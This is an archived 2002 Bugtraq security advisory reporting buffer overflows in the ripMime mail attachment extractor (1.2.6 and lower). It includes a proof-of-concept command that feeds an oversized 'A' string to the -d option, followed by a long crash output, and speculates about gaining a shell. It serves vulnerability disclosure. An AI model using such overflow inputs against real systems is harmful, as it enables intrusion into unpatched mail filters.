[23966] in bugtraq


pldaniels - ripMime 1.2.6 and lower?

daemon@ATHENA.MIT.EDU (KF)
Wed Jan 23 18:22:04 2002

Message-ID: <3C4DCC8C.6080403@snosoft.com>
Date: Tue, 22 Jan 2002 15:33:16 -0500
From: KF <dotslash@snosoft.com>
To: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Attachment: ripmime-overflow.txt (text/plain)

ripMime mail filter remote / local overflows. At least version 1.2.6
vendor: http://www.pldaniels.com/ripmime/
Details:
CHANGELOG - 15/11/2001 - 20H57 - v1.2.7 Corrected buffer overflow problems with exceptionally long file names. Corrected filename
length problems with OS level fread/write calls.

FreeBSD/ports/mail/ripmime/pkg-descr
 The FreeBSD Ports Collection ("mail/ripmime")
 You are now in the directory for the port "mail/ripmime" (package name "ripmime-1.2.4").
 This is the one-line description for this port:
 Extracts attached files out of a MIME encoded email package

Based on the above info ripmime is part of the FreeBSD ports collection as far as I can tell... I am not totally sure what it is used for because its poster application is Commercial and I do not have a copy of the software "XaMime". I do know however that somehow it interfaces with sendmail to strip attachments or filter their content. I have been able to cause a core dump via 2 methods; one requires no user intervention and can be done remotely, however it does not yield an overwrite of the eip. The second method, which I explain below, could yield a shell under some circumstances, perhaps locally; again I do not know what the full potential use of ripmime is.

One possible use is in the above mentioned Commercial application located at:
XaMime | Examine your e-mails
XaMime Mail and Virusfilter
URL: http://www.xamime.de/ or http://www.xamime.com
It is some sort of commercial solution for email filtering.

ripMime also comes as part of the inflex package used for filtering virii from attachments etc on unix boxen.
http://www.spyda.co.za/inflex/mainpage.html or http://www.pldaniels.com/inflex/

Here is an example of the issues at hand
./ripmime -i mail -d `perl -e 'print "A" x 255'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA